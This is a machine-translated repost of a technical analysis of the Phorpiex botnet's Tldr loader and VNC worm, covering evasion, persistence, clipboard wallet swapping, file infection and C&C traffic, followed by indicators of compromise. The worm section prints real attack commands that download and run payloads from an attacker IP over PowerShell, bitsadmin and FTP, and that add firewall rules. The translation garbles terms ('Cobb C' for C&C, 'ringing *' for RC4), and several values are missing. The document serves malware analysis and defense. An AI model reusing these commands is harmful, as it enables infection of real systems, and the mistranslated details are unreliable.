Shulou(Shulou.com)05/31 Report--

How to carry out Phorpiex botnet technical analysis, in view of this problem, this article introduces the corresponding analysis and answer in detail, hoping to help more partners who want to solve this problem to find a more simple and feasible method.

Summary

At the heart of the Phorpiex botnet is a loader called Tldr. It is responsible for loading other malicious modules and other malicious software into the infected computer. Each module is a separate Windows executable. Usually the Phorpiex module is very small and simple. Malware configurations (usually including Cobb server addresses, cryptocurrency wallets, and URL for malicious payloads) are hard-coded in the malware executable. If you need to update the configuration, the botnet only needs to load the new module to the infected computer. These modules are updated frequently to make minor changes. The following types of modules were discovered during 2019:

Loader Phorpiex Tldr.

VNC Worm Module.

NetBIOS Worm Module.

XMRig Silent Miner.

Spam Module: Self-spreading and Sextortion

Auxiliary modules (small target location and trace cleaning module).

Three of these modules (Tldr,VNC worm and NetBIOS worm) have self-propagation capabilities. For example, Tldr has the ability to infect viruses and can infect other files. The VNC worm connects to the VNC server with a weak password and attempts to infect it by impersonating user input. In the first part, two modules are analyzed in detail: Loader Phorpiex Tldr,VNC Worm Module.

Phorpiex Tldr

Tldr ("TrikLoader") is one of the key parts of the Phorpiex botnet infrastructure.

When the malware was first discovered, it could not be identified or analyzed for contact with other botnets. But as can be seen from its binaries, mutex name and sandbox evasion techniques, this malware and Phorpiex Trik IRC bot were developed by the same group of cybercriminals, and several intersections were found between Trik and Tldr ClearC servers.

At present, there are a large number of Phorpiex Tldr versions, each with different functions. The focus of the analysis is on the features they share, especially the new features added in the latest version (since July 2019). The main purpose of Tldr malware is to download and execute other modules and malware to an infected computer. Tldr also has the ability to spread itself, which is similar to worms or file viruses and can infect other software.

Circumvention technology

Phorpiex Tldr uses a simple sandboxie evasion technique. When started, it calls the GetModuleHandle API function to check if one of the following modules is loaded in the process:

SBIEDLL.DLL

SBIEDLLX.DLL

WPESPY.DLL

DIR_WATCH.DLL

API_LOG.DLL

DIR_WATCH.DLL

PSTOREC.DLL

It then enumerates the running processes and checks to see if the process file name is one of the following:

VBOXSERVICE.EXE

VBOXTRAY.EXE

VMTOOLSD.EXE

VMWARETRAY.EXE

VMWAREUSER

VMSRVC.EXE

VMUSRVC.EXE

PRL_TOOLS.EXE

XENSERVICE.EXE

Older versions of Tldr (TldrV3, May 2018) also check these processes: then enumerate the running processes and check to see if the process name is one of the following:

Python.exe

Pythonw.exe

Prl_cc.exe

Vboxservice.exe

Vboxcontrol.exe

Tpautoconnsvc.exe

Finally, Tldr calls the IsDebuggerPresent API function to check if malware is being debugged. If a check fails, Tldr stops execution.

Initialization

The initialization steps are very similar to the initialization steps of Phorpiex Trik. To prevent multiple Phorpiex Tldr from running, it creates a mutex with a specific hard-coded name. Earlier versions used the mutex name of the version number, such as "TldrV3". In the latest version, each series has a different mutex name. It usually consists of several digits, such as "6486894".

The next step is that all Phorpiex samples are the same: delete the ": Zone.Identifier" alternative data stream. This is done to eliminate the problem that the file source is an untrusted source. Versions (Tldr v5.0) since July 2019 have Debug privileges:

Persistence

Tldr copies itself to the following folder:

% windir%

% userprofile%

% systemdrive% (only version from July 2019)

% temp%

For Phorpiex Tldr V3, the selected path and file name are the same as Phorpiex Trik. Tldr creates a subfolder under these paths that starts with "T -" (in Phorpiex Trik, the name starts with "M -"). The malware then copies its executable file to a folder. For example:

C:\ WINDOWS\ Tmur9759504507674060850740\ winsvc.exe

Unlike Phorpiex Tldr v3, newer versions create replication only if the file name does not contain a "sys" substring. It uses a subfolder name generated by a random number and a file name that starts with "sys" with four random letters:

C:\ WINDOWS\ 2813528135\ sysjekp.exe

Phorpiex Tldr sets the property FILE_ATTRIBUTE_READONLY,FILE_ATTRIBUTE_HIDDEN,FILE_ATTRIBUTE_SYSTEM for the created files and subfolders. Then set the registry to run automatically:

HKCU\ Software\ Microsoft\ Windows\ CurrentVersion\ Run\

HKLM\ Software\ Microsoft\ Windows\ CurrentVersion\ Run\

Tldr uses hard coding to create new registry values. The name in the study sample is "Windows Operating System":

It adds firewall rules through the registry key:

SYSTEM\ CurrentControlSet\ Services\ SharedAccess\ Parameters\ FirewallPolicy\ StandardProfile\ AuthorizedApplications\ List\

Bypass windows security measures

The Phorpiex Tldr version (Tldr v5) since July 2019 disables Windows security features such as Windows Defender, security notification, and system restore by setting the following registry values:

Main function

Each malicious activity Phorpiex Tldr creates a separate thread.

Crypto Clipper

All samples contain the ability to steal cryptocurrency by changing the address of the cryptocurrency wallet on the clipboard of the infected system. Malware calls the API functions OpenClipboard and GetClipboardData to query clipboard data every 200ms. To determine if the clipboard contains an encrypted wallet address, Phorpiex Tldr makes the following checks:

1. Whether the initials are: 1, 3, Q, 2, X, D, 0, L, 4, P, t, z, G, U, E

2. the length is 25 to 45 characters or 9 letters, or 90 to 115 letters

3. Does not include O (0x4F), I (0x49), l (0x6C)

4. Contains only numbers and letters

If any of the checks fail, the clipboard remains unchanged. Otherwise, it further determines the cryptocurrency wallet address type and changes it to one of the hard-coded values. Phorpiex Tldr determines the type by the first character of the clipboard data:

Supported cryptocurrency types include:

Bitcoin

Bitcoin Cash

Ethereum

DASH

Dogecoin

Litecoin

Monero

Zcash

Crypto Clipper also handles Perfect Money wallets (gold, US dollars, euros):

Self-spreading

The file worm function is implemented in this thread. In an infinite loop, Tldr uses GetLogicalDrives to enumerate the available drives. Read the registry key value "NoDrives" of "Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer", exclude drives that are disabled by NoDrives Windows Explorer policy from the enumeration, and select removable and remote drives. On each selected drive, a folder named "_ _" is created and the properties are set to FILE_ATTRIBUTE_READONLY,FILE_ATTRIBUTE_HIDDEN and FILE_ATRRIBUTE_SYSTEM to make it invisible in Explorer.

The malware copies itself to this folder with a hard-coded name ("DriveMgr.exe" in the example). Tldr gets the volume name of the selected drive. Then create a shortcut called "{volume_name} .lnk" in the root folder of the selected drive:

% windir%\ system32\ cmd.exe / c start _ & _ _\ DriveMgr.exe & exit

Tldr then moves all folders from the root path of the selected drive to the folder "_". It also deletes all files in the root path with the following extension:

* .lnk, * .vbs, * .bat, * .js, * .scr, * .com, * .jse, * .cmd,*.pif, * .jar, * .dll, * .vbe, * .inf "

The reason for this may be to disable all other worms on the same drive. A new feature has been introduced in Tldr v5.0 that allows malware to infect other executables. Previously, Phorpiex used separate modules to infect other software. Malware scans all folders on removable and remote drives and infects all uninfected .exe files.

To infect the PE file, Tldr makes the following modifications: increase the number of sections in the header of the PE file, and set the timeDateStamp value of the header to 0x0000DEAD:

Malware also uses values in TimeDateStamp to detect whether the file has been infected. The value 0x0000DEAD is converted to a timestamp 1970-01-01 15:50:05. Infected samples can be easily found on VirusTotal using the following query:

Pets:1970-01-01T15:50:05

Tldr also creates a new code snippet called ".zero" to copy the malicious payload to it. Modify the entry point address to point to the beginning of the created section. The malware does not recalculate the checksum, just resets to 0.

The malware writes its relative address in the main code:

Use the value 0xCCCCCCCC to find the original entry point in the template function:

Shellcode

The shellcode inserted into the infected file consists of several functions. Do not use an absolute address and run correctly when placed in any memory location.

First, shellcode checks whether the file "% appdata%\ winsvcs.txt" exists. If the file exists, shellcode will do nothing but transfer control to the original entry point of the infected program; if the file exists, another file will be downloaded and executed from the hard-coded URL:

Use URLDownloadToFileW to download the file to a temporary file. Use the functions GetTempPathW and GetTempFileNameW to get the name of the temporary file. If the file is downloaded successfully, shellcode removes the ": Zone.Identifier" ADS from the file and executes the file using CreateProcessW.

Cobb C check

When running for the first time, Phorpiex Tldr uses the hard-coded list of Cobb C servers to make HTTP requests to its Cobb C servers:

Tldr creates a thread for each Cobb C server. Before starting the thread, the malware creates an empty file "% appdata%\ winsvcs.txt". This file is used as a flag to determine whether the malware is running for the first time. If the file already exists, no thread is created.

In each thread, the malware queries the following URL:

Http:///t.php?new=1

You can also see URL in different formats in other samples, such as:

Http:///tldr.php?new=1

Http:///tldr.php?on=1

Http:///tldr.php?new=1&id=

Http:///tldr.php?new=1&on=

To execute the request, Phorpiex Tldr uses a specific hard-coded value for the user request header. The values starting from July 2019 are:

Mozilla / 5.0 (Windows NT 10.0; Win64; x64; rv:67.0) Gecko / 20100101 Firefox / 67.0

Values for older versions:

Mozilla / 5.0 (Macintosh; Intel Mac OS X 10.9; rv:25.0) Gecko / 20100101 Firefox / 25.0

The generated HTTP request is as follows:

Main thread

The primary purpose of Phorpiex Tldr is to download and execute other malicious payloads on infected hosts. It uses hard-coded paths (usually 4 to 8) to create a URL for downloading files:

Http:///1.exe

Http:///2.exe

For each generated URL, malware first uses InternetOpenUrlA and HttpQueryInfoA to check its availability and size. If URL is available, Tldr remembers the size of each path. If the size is the same as the previous value, URL is skipped to prevent re-download. If URL is available or the content length is different from the previous value, Tldr downloads it and executes it. The downloaded file is saved in the% temp% folder with the name:

"d.exe" random.randint (10000, 40000)

Tldr will have two attempts to download the file: using InternetOpenUrlW / InternetReadFile; if it fails the first time, using URLDownloadToFileW. After downloading the file, Porpiex Tldr deletes ": Zone.Identifier". Then use CreateProcess to execute the downloaded file twice, and if the first fails, use ShellExecute.

The latest version of Tldr (v5) has been greatly improved, using files with ringing * and RSA-SHA1 signature verification. The encrypted file header contains magic bytes ("NGS!" The length of the RSA signature and the RSA signature used to verify the file The first 16 bytes of the RSA signature are used as the ringing * decryption key:

Phorpiex Tldr uses the 16-byte ringing * key in the file to decrypt the data and then calculates the SHA1 hash of the decrypted file. To verify the digital signature, Tldr uses a 4096-bit RSA public key hard-coded into the sample.

VNC Worm module

One of the modules found in Phorpiex is a malicious VNC client. It does not have its own persistence mechanism and is executed by Tldr every time. Malware scans random IP addresses for open VNC server ports (5900) and uses hard-coded lists for brute force attacks. The ultimate goal is to load and execute another malware (usually Phorpiex Tldr) on the target host.

The Phorpiex VNC worm used API bombing technology to circumvent sandboxie from the very beginning. It performs a large number of meaningless calls to multiple functions in the loop:

Use a hard-coded name mutex to prevent multiple execution:

The attack itself is infinitely cyclic. The IP address for scanning is randomly generated using the rand function, and GetTickCount is used as a random seed. The only filtering rule for IP addresses is that it cannot start with 127,172 or 192. If you successfully connect to TCP port 5900, the VNC worm uses the password list to launch a brute force attack on the discovered VNC server:

The password list may vary from sample to sample. If the attack succeeds, report the results to the ClearC server using URL in the following format:

Hxxp://92.63.197.153/result.php?vnc=%s |% s "% (host, password)

Finally, Phorpiex VNC executes multiple scripts on the victim's computer by simulating keyboard input using the VNC protocol.

Do the following:

Cmd.exe / c PowerShell-ExecutionPolicy Bypass (New-Object System.Net.WebClient) .DownloadFile ('http://92.63.197.153/vnc.exe','%temp%\48303045850.exe'); Start-Process'% temp%\ 48303045850.exe'cmd.exe / c bitsadmin / transfer getitman / download / priority high http://92.63.197.153/vnc.exe%temp%\49405003030.exe&start% temp%\ 49405003030.execmd.exe / c netsh firewall add allowedprogram C:\ Windows\ System32\ ftp.exe "ok" ENABLE&netsh advfirewall firewall add rule name= "ok" dir=in action=allow program= "C:\ Windows\ System32\ ftp.exe" enable=yescmd.exe / c "cd% temp%&@echo open 92.63 .197.153 > > ftpget.txt&@echo tom > > ftpget.txt&@echo hehehe > > ftpget.txt&@echo binary > > ftpget.txt&@echo get vnc.exe > > ftpget.txt&@echo quit > > ftpget.txt&@ftp-s:ftpget.txt&@start vnc.exe "

The Phorpiex VNC worm causes the victim's computer to download and execute malicious scripts from the server via HTTP or FTP:

Ftp://tom:hehehe@92.63.197[.]153/vnc.exe

Ftp://tom:hehehe@92.63.197[.]153/ohuh.exe

Http://92.63.197[.]153/vnc.exe

Http://92.63.197[.]153/ohuh.exe

IOCPhorpiex Tldr

Phorpiex Tldr ClearC IP and Domain

185.176.27.132

193.32.161.69

193.32.161.73

193.32.161.77

92.63.197.153

92.63.197.38

92.63.197.59

92.63.197.60

94.156.133.65

Aiiaiafrzrueuedur.ru

Fafhoafouehfuh.su

Ffoeefsheuesihfo.ru

Osheoufhusheoghuesd.ru

Ouhfuosuoosrhzfzr.ru

Slpsrgpsrhojifdij.ru

Unokaoeojoejfghr.ru

B0t.to

Thaus.to

Thaus.top

Phorpiex Tldr related url

Hxxp://185.176.27 [.] 132/a.exe

Hxxp://aiiaiafrzrueuedur.ru/o.exe

Hxxp://185.176.27 [.] 132/1

Hxxp://185.176.27 [.] 132/2

Hxxp://185.176.27 [.] 132/3

Hxxp://185.176.27 [.] 132/4

Hxxp://185.176.27 [.] 132/5

Hxxp://185.176.27 [.] 132/6

Hxxp://185.176.27 [.] 132/7

Hxxp://193.32.161 [.] 69/1.exe

Hxxp://193.32.161 [.] 69/2.exe

Hxxp://193.32.161 [.] 69/3.exe

Hxxp://193.32.161 [.] 69/4.exe

Hxxp://193.32.161 [.] 69/5.exe

Hxxp://193.32.161 [.] 69/6.exe

Hxxp://193.32.161 [.] 69/7.exe

Hxxp://193.32.161 [.] 69/ya.exe

Hxxp://193.32.161 [.] 73/1

Hxxp://193.32.161 [.] 73/2

Hxxp://193.32.161 [.] 73/3

Hxxp://193.32.161 [.] 73/4

Hxxp://193.32.161 [.] 73/5

Hxxp://193.32.161 [.] 73/6

Hxxp://193.32.161 [.] 73/s.exe

Hxxp://193.32.161 [.] 77/11.exe

Phorpiex VNC Worm

This is the answer to the question on how to analyze the Phorpiex botnet. I hope the above content can be of some help to you. If you still have a lot of doubts to be solved, you can follow the industry information channel for more related knowledge.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.